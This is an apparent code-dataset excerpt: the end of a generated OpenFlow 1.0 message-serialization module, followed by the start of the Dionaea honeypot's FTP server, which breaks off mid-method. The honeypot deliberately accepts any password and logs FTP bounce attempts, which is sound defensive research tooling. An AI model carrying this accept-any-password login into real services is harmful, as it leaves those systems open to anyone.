                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("port = ");
                q.text(util.pretty_port(self.port))
                q.text(","); q.breakable()
                q.text("queues = ");
                q.pp(self.queues)
            q.breakable()
        q.text('}')

# register queue_get_config_reply as the handler for message type 21
message.subtypes[21] = queue_get_config_reply
class queue_get_config_request(message):
    """queue_get_config_request message (OpenFlow wire version 1, type 20)."""
    version = 1
    type = 20

    def __init__(self, xid=None, port=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if port != None:
            self.port = port
        else:
            self.port = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(util.pack_port_no(self.port))
        packed.append('\x00' * 2)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a queue_get_config_request from *reader*."""
        obj = queue_get_config_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 20)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.port = util.unpack_port_no(reader)
        reader.skip(2)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.port != other.port: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("queue_get_config_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("port = ");
                q.text(util.pretty_port(self.port))
            q.breakable()
        q.text('}')

# register queue_get_config_request as the handler for message type 20
message.subtypes[20] = queue_get_config_request
class queue_op_failed_error_msg(error_msg):
    """error_msg subtype for err_type 5 (queue op failed), wire version 1."""
    version = 1
    type = 1
    err_type = 5

    def __init__(self, xid=None, code=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if code != None:
            self.code = code
        else:
            self.code = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        packed.append(struct.pack("!H", self.code))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a queue_op_failed_error_msg from *reader*."""
        obj = queue_op_failed_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 5)
        obj.code = reader.read("!H")[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("queue_op_failed_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("code = ");
                q.text("%#x" % self.code)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')

# dispatch on the err_type field of error_msg
error_msg.subtypes[5] = queue_op_failed_error_msg
class queue_stats_reply(stats_reply):
    """stats_reply subtype for stats_type 5 (queue stats), wire version 1."""
    version = 1
    type = 17
    stats_type = 5

    def __init__(self, xid=None, flags=None, entries=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if entries != None:
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a queue_stats_reply from *reader*."""
        obj = queue_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 5)
        obj.flags = reader.read("!H")[0]
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.queue_stats_entry.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.entries != other.entries: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("queue_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("entries = ");
                q.pp(self.entries)
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_reply
stats_reply.subtypes[5] = queue_stats_reply
class queue_stats_request(stats_request):
    """stats_request subtype for stats_type 5 (queue stats), wire version 1."""
    version = 1
    type = 16
    stats_type = 5

    def __init__(self, xid=None, flags=None, port_no=None, queue_id=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if queue_id != None:
            self.queue_id = queue_id
        else:
            self.queue_id = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(util.pack_port_no(self.port_no))
        packed.append('\x00' * 2)
        packed.append(struct.pack("!L", self.queue_id))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a queue_stats_request from *reader*."""
        obj = queue_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 5)
        obj.flags = reader.read("!H")[0]
        obj.port_no = util.unpack_port_no(reader)
        reader.skip(2)
        obj.queue_id = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.port_no != other.port_no: return False
        if self.queue_id != other.queue_id: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("queue_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("queue_id = ");
                q.text("%#x" % self.queue_id)
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_request
stats_request.subtypes[5] = queue_stats_request
class set_config(message):
    """set_config message (OpenFlow wire version 1, message type 9)."""
    version = 1
    type = 9

    def __init__(self, xid=None, flags=None, miss_send_len=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if miss_send_len != None:
            self.miss_send_len = miss_send_len
        else:
            self.miss_send_len = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.flags))
        packed.append(struct.pack("!H", self.miss_send_len))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a set_config from *reader*."""
        obj = set_config()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 9)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.flags = reader.read("!H")[0]
        obj.miss_send_len = reader.read("!H")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.miss_send_len != other.miss_send_len: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("set_config {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("miss_send_len = ");
                q.text("%#x" % self.miss_send_len)
            q.breakable()
        q.text('}')

# register set_config as the handler for message type 9
message.subtypes[9] = set_config
class table_mod(message):
    """table_mod message (OpenFlow wire version 1, message type 22)."""
    version = 1
    type = 22

    def __init__(self, xid=None, table_id=None, config=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if table_id != None:
            self.table_id = table_id
        else:
            self.table_id = 0
        if config != None:
            self.config = config
        else:
            self.config = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!B", self.table_id))
        packed.append('\x00' * 3)
        packed.append(struct.pack("!L", self.config))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a table_mod from *reader*."""
        obj = table_mod()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 22)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.table_id = reader.read("!B")[0]
        reader.skip(3)
        obj.config = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.table_id != other.table_id: return False
        if self.config != other.config: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("table_mod {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("table_id = ");
                q.text("%#x" % self.table_id)
                q.text(","); q.breakable()
                q.text("config = ");
                q.text("%#x" % self.config)
            q.breakable()
        q.text('}')

# register table_mod as the handler for message type 22
message.subtypes[22] = table_mod
class table_stats_reply(stats_reply):
    """stats_reply subtype for stats_type 3 (table stats), wire version 1."""
    version = 1
    type = 17
    stats_type = 3

    def __init__(self, xid=None, flags=None, entries=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if entries != None:
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a table_stats_reply from *reader*."""
        obj = table_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 3)
        obj.flags = reader.read("!H")[0]
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.table_stats_entry.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.entries != other.entries: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("table_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("entries = ");
                q.pp(self.entries)
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_reply
stats_reply.subtypes[3] = table_stats_reply
class table_stats_request(stats_request):
    """stats_request subtype for stats_type 3 (table stats), wire version 1."""
    version = 1
    type = 16
    stats_type = 3

    def __init__(self, xid=None, flags=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a table_stats_request from *reader*."""
        obj = table_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 3)
        obj.flags = reader.read("!H")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("table_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_request
stats_request.subtypes[3] = table_stats_request
def parse_header(buf):
    """Decode the fixed 8-byte OpenFlow header of *buf*.

    Returns the tuple (version, type, length, xid).  Raises
    loxi.ProtocolError when *buf* holds fewer than 8 bytes.
    """
    if len(buf) >= 8:
        return struct.unpack_from("!BBHL", buf)
    raise loxi.ProtocolError("too short to be an OpenFlow message")
def parse_message(buf):
    """Parse one complete OpenFlow message from *buf* into a message object.

    Raises loxi.ProtocolError when a non-HELLO message carries the wrong
    wire version (HELLO is exempt, per the condition below) or when the
    buffer size disagrees with the header's length field.
    """
    msg_ver, msg_type, msg_len, msg_xid = parse_header(buf)
    if msg_ver != ofp.OFP_VERSION and msg_type != ofp.OFPT_HELLO:
        raise loxi.ProtocolError("wrong OpenFlow version (expected %d, got %d)" % (ofp.OFP_VERSION, msg_ver))
    if len(buf) != msg_len:
        raise loxi.ProtocolError("incorrect message size")
    return message.unpack(loxi.generic_util.OFReader(buf))
| gzamboni/sdnResilience | loxi/of10/message.py | Python | gpl-2.0 | 248,179 |
#*************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
# Copyright (c) 2009 Markus Koetter
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# Copyright (c) 2001-2009
#
# Allen Short
# Andrew Bennetts
# Apple Computer, Inc.
# Benjamin Bruheim
# Bob Ippolito
# Canonical Limited
# Christopher Armstrong
# David Reid
# Donovan Preston
# Eric Mangold
# Itamar Shtull-Trauring
# James Knight
# Jason A. Mobarak
# Jean-Paul Calderone
# Jonathan Lange
# Jonathan D. Simms
# Juergen Hermann
# Kevin Turner
# Mary Gardiner
# Matthew Lefkowitz
# Massachusetts Institute of Technology
# Moshe Zadka
# Paul Swartz
# Pavel Pergamenshchik
# Ralph Meijer
# Sean Riley
# Software Freedom Conservancy
# Travis B. Hartwell
# Thomas Herve
# Eyal Lotem
# Antoine Pitrou
# Andy Gayton
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/
# ftp server
from dionaea.core import connection, ihandler, g_dionaea, incident
import logging
import os
import urllib.parse
import tempfile
# Module-level logger for the FTP service; debug level is forced on here.
logger = logging.getLogger('ftp')
logger.setLevel(logging.DEBUG)
#
# the following definitions are taken from twisted
# MIT licensed code, gpl compatible
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
#
# FTP reply-code keys.  Keys of the form "NNN.k" distinguish variants
# that share the same numeric reply code NNN (e.g. "230.1"/"230.2").
DATA_CNX_ALREADY_OPEN_START_XFR = "125"
FILE_STATUS_OK_OPEN_DATA_CNX = "150"
CMD_OK = "200.1"
TYPE_SET_OK = "200.2"
ENTERING_PORT_MODE = "200.3"
CMD_NOT_IMPLMNTD_SUPERFLUOUS = "202"
SYS_STATUS_OR_HELP_REPLY = "211"
DIR_STATUS = "212"
FILE_STATUS = "213"
HELP_MSG = "214"
NAME_SYS_TYPE = "215"
SVC_READY_FOR_NEW_USER = "220.1"
WELCOME_MSG = "220.2"
SVC_CLOSING_CTRL_CNX = "221"
GOODBYE_MSG = "221"
DATA_CNX_OPEN_NO_XFR_IN_PROGRESS = "225"
CLOSING_DATA_CNX = "226"
TXFR_COMPLETE_OK = "226"
ENTERING_PASV_MODE = "227"
ENTERING_EPSV_MODE = "229"
USR_LOGGED_IN_PROCEED = "230.1" # v1 of code 230
GUEST_LOGGED_IN_PROCEED = "230.2" # v2 of code 230
REQ_FILE_ACTN_COMPLETED_OK = "250"
PWD_REPLY = "257.1"
MKD_REPLY = "257.2"
USR_NAME_OK_NEED_PASS = "331.1" # v1 of Code 331
GUEST_NAME_OK_NEED_EMAIL = "331.2" # v2 of code 331
NEED_ACCT_FOR_LOGIN = "332"
REQ_FILE_ACTN_PENDING_FURTHER_INFO = "350"
SVC_NOT_AVAIL_CLOSING_CTRL_CNX = "421.1"
TOO_MANY_CONNECTIONS = "421.2"
CANT_OPEN_DATA_CNX = "425"
CNX_CLOSED_TXFR_ABORTED = "426"
REQ_ACTN_ABRTD_FILE_UNAVAIL = "450"
REQ_ACTN_ABRTD_LOCAL_ERR = "451"
REQ_ACTN_ABRTD_INSUFF_STORAGE = "452"
SYNTAX_ERR = "500"
SYNTAX_ERR_IN_ARGS = "501"
CMD_NOT_IMPLMNTD = "502"
BAD_CMD_SEQ = "503"
CMD_NOT_IMPLMNTD_FOR_PARAM = "504"
# v1 of code 530 - please log in
NOT_LOGGED_IN = "530.1"
# v2 of code 530 - authorization failure
AUTH_FAILURE = "530.2"
NEED_ACCT_FOR_STOR = "532"
# no such file or directory
FILE_NOT_FOUND = "550.1"
PERMISSION_DENIED = "550.2" # permission denied
# anonymous users can't alter filesystem
ANON_USER_DENIED = "550.3"
# rmd called on a path that is not a directory
IS_NOT_A_DIR = "550.4"
REQ_ACTN_NOT_TAKEN = "550.5"
FILE_EXISTS = "550.6"
IS_A_DIR = "550.7"
PAGE_TYPE_UNK = "551"
EXCEEDED_STORAGE_ALLOC = "552"
FILENAME_NOT_ALLOWED = "553"
# Canned reply lines, keyed by the constants above.  Entries containing a
# %-placeholder are filled in by ftpd.reply(key, *args).
RESPONSE = {
    # -- 100's --
    DATA_CNX_ALREADY_OPEN_START_XFR: '125 Data connection already open, starting transfer',
    FILE_STATUS_OK_OPEN_DATA_CNX: '150 File status okay; about to open data connection.',
    # -- 200's --
    CMD_OK: '200 Command OK',
    TYPE_SET_OK: '200 Type set to %s.',
    ENTERING_PORT_MODE: '200 PORT OK',
    SYS_STATUS_OR_HELP_REPLY: '211 System status reply',
    DIR_STATUS: '212 %s',
    FILE_STATUS: '213 %s',
    HELP_MSG: '214 help: %s',
    NAME_SYS_TYPE: '215 UNIX Type: L8',
    WELCOME_MSG: "220 %s",
    SVC_READY_FOR_NEW_USER: '220 Service ready',
    GOODBYE_MSG: '221 Goodbye.',
    DATA_CNX_OPEN_NO_XFR_IN_PROGRESS: '225 data connection open, no transfer in progress',
    CLOSING_DATA_CNX: '226 Abort successful',
    TXFR_COMPLETE_OK: '226 Transfer Complete.',
    ENTERING_PASV_MODE: '227 Entering Passive Mode (%s).',
    # where is epsv defined in the rfc's?
    ENTERING_EPSV_MODE: '229 Entering Extended Passive Mode (|||%s|).',
    USR_LOGGED_IN_PROCEED: '230 User logged in, proceed',
    GUEST_LOGGED_IN_PROCEED: '230 Anonymous login ok, access restrictions apply.',
    #i.e. CWD completed ok
    REQ_FILE_ACTN_COMPLETED_OK: '250 Requested File Action Completed OK',
    PWD_REPLY: '257 "%s"',
    # -- 300's --
    USR_NAME_OK_NEED_PASS: '331 Password required for %s.',
    GUEST_NAME_OK_NEED_EMAIL: '331 Guest login ok, type your email address as password.',
    REQ_FILE_ACTN_PENDING_FURTHER_INFO: '350 Requested file action pending further information.',
    # -- 400's --
    CANT_OPEN_DATA_CNX: "425 Can't open data connection.",
    CNX_CLOSED_TXFR_ABORTED: '426 Transfer aborted. Data connection closed.',
    # -- 500's --
    SYNTAX_ERR: "500 Syntax error: %s",
    SYNTAX_ERR_IN_ARGS: '501 syntax error in argument(s) %s.',
    CMD_NOT_IMPLMNTD: "502 Command '%s' not implemented",
    BAD_CMD_SEQ: '503 Incorrect sequence of commands: %s',
    CMD_NOT_IMPLMNTD_FOR_PARAM: "504 Not implemented for parameter '%s'.",
    NOT_LOGGED_IN: '530 Please login with USER and PASS.',
    AUTH_FAILURE: '530 Sorry, Authentication failed.',
    FILE_NOT_FOUND: '550 %s: No such file or directory.',
    PERMISSION_DENIED: '550 %s: Permission denied.',
}
class ftpd(connection):
    """Minimal FTP server used as a honeypot service.

    Implements just enough of RFC 959 (USER/PASS login, PORT/PASV data
    channels, LIST, RETR/STOR and a few informational commands) to look
    like a real server.  All filesystem access is confined to
    ``self.basedir`` (see chroot()).
    """
    # session states: not logged in, USER seen (waiting for PASS),
    # fully authenticated, rename in progress
    UNAUTH, INAUTH, AUTHED, RENAMING = range(4)
    def __init__ (self, proto='tcp'):
        connection.__init__(self, proto)
        logger.debug("ftp test")
        self.state = self.UNAUTH
        self.user = 'bar'
        self.cwd = '/'
        self.basedir = '/tmp/ranz'
        self.dtp = None   # active data connection (PORT / accepted PASV)
        self.dtf = None   # passive-mode listening connection
        self.limits = {}#{ '_out' : 8192 }
    def chroot(self, p):
        """Confine all later filesystem operations to directory *p*."""
        self.basedir = p
    def sendline(self, data):
        """Send one CRLF-terminated protocol line."""
        self.send(data + '\r\n')
    def reply(self, key, *args):
        """Send the canned RESPONSE string for *key*, %-formatted with *args*."""
        msg = RESPONSE[key] % args
        self.sendline(msg)
    def handle_origin(self, parent):
        # inherit the chroot directory from the listening parent connection
        logger.debug("setting basedir to %s" % parent.basedir)
        self.basedir = parent.basedir
    def handle_established(self):
        self.processors()
        self.reply(WELCOME_MSG, "Welcome to the ftp service")
    def handle_io_in(self, data):
        """Consume complete lines from *data*; return the byte count handled."""
        logger.debug(data)
        lastsep = data.rfind(b"\n")
        if lastsep == -1:
            # no complete command yet - leave everything in the buffer
            logger.debug("data without linebreak")
            return 0
        lastsep += 1 # add last \n
        logger.debug("input size %i, can do %i" % (len(data), lastsep))
        data = data[:lastsep]
        lines = data.splitlines(0)
        for line in lines:
            logger.debug("processing line '%s'" % line)
            if len(line) == 0:
                continue
            space = line.find(b' ')
            if space != -1:
                cmd = line[:space]
                args = (line[space + 1:],)
            else:
                cmd = line
                args = ()
            logger.warn("cmd '%s'" % cmd)
            r = self.processcmd(cmd, args)
            if isinstance(r,tuple):
                self.reply(*r)
            elif r is not None:
                self.reply(r)
        return lastsep
    def processcmd(self, cmd, args):
        """Dispatch one command; return a RESPONSE key, a (key, args) tuple or None."""
        logger.debug("cmd '%s'" % cmd)
        l = [i.decode() for i in args]
        cmd = cmd.upper()
        if self.state == self.UNAUTH:
            if cmd != b'USER':
                return NOT_LOGGED_IN
            # BUG FIX: dispatch once with the decoded argument (the old code
            # called ftp_USER with raw bytes and then dispatched a second time)
            return self.ftp_USER(*l)
        elif self.state == self.INAUTH:
            if cmd != b'PASS':
                return (BAD_CMD_SEQ, "PASS required after USER")
            return self.ftp_PASS(*l)
        method = getattr(self, "ftp_" + cmd.decode(), None)
        if method is not None:
            return method(*l)
        else:
            return (CMD_NOT_IMPLMNTD, cmd.decode())
    def ftp_USER(self, username=None):
        """USER <name>: remember the name and ask for a password."""
        if not username:
            return (SYNTAX_ERR, 'USER requires an argument')
        self.state = self.INAUTH
        self.user = username
        if username == 'anonymous':
            return GUEST_NAME_OK_NEED_EMAIL
        else:
            return (USR_NAME_OK_NEED_PASS, username)
    def ftp_PASS(self, password=None):
        """PASS <pw>: any password is accepted - this is a honeypot."""
        if not password:
            return (SYNTAX_ERR, 'PASS requires an argument')
        self.state = self.AUTHED
        if self.user == 'anonymous':
            return GUEST_LOGGED_IN_PROCEED
        else:
            return USR_LOGGED_IN_PROCEED
    def ftp_FEAT(self):
        """FEAT: advertise the (tiny) supported feature set."""
        self.send('211-Features:\r\n' +
                  ' PASV\r\n' +
                  ' PORT\r\n' +
                  '211 End\r\n')
        return None
    def ftp_PORT(self, address):
        """PORT h1,h2,h3,h4,p1,p2: open an active-mode data connection."""
        # drop any previous data channel before opening a new one
        if self.dtf:
            self.dtf.close()
            self.dtf = None
        if self.dtp:
            self.dtp.close()
            self.dtp = None
        addr = list(map(int, address.split(',')))
        ip = '%d.%d.%d.%d' % tuple(addr[:4])
        port = addr[4] << 8 | addr[5]
        logger.debug("PORT cmd for port %i" % port)
        # refuse to connect to hosts other than the client (FTP bounce)
        if self.remote.host != ip and "::ffff:" + self.remote.host != ip:
            logger.warn("Potential FTP Bounce Scan detected")
            return None
        self.dtp = ftpdataconnect(ip, port, self)
        return None
    def ftp_PASV(self):
        """PASV: listen on an ephemeral port and announce it to the client."""
        if self.dtf:
            self.dtf.close()
            self.dtf = None
        if self.dtp:
            self.dtp.close()
            self.dtp = None
        self.dtf = ftpdatalisten(host=self.local.host, port=0, ctrl=self)
        host = self.dtf.local.host
        port = self.dtf.local.port
        self.reply(ENTERING_PASV_MODE, encodeHostPort(host, port))
    def ftp_QUIT(self):
        self.reply(GOODBYE_MSG)
        self.close()
    def real_path(self, p=None):
        """Map a client path *p* (relative to cwd) onto the chrooted filesystem.

        The result is normalized; callers must still verify it starts with
        self.basedir to reject '..' escapes.
        """
        if p:
            name = os.path.join(self.cwd, p)
        else:
            name = self.cwd
        if len(name) >= 1 and name[0] == '/':
            name = name[1:]
        name = os.path.join(self.basedir, name)
        name = os.path.normpath(name)
        return name
    def _log_dtp_state(self):
        """Log why a transfer could not start on the data channel."""
        if self.dtp is None:
            # BUG FIX: the old code dereferenced self.dtp here although it
            # is known to be None in this branch
            logger.warn("no dtp on ctrl %s:%i <-> %s:%i!" %
                        (self.remote.host, self.remote.port,
                         self.local.host, self.local.port))
        else:
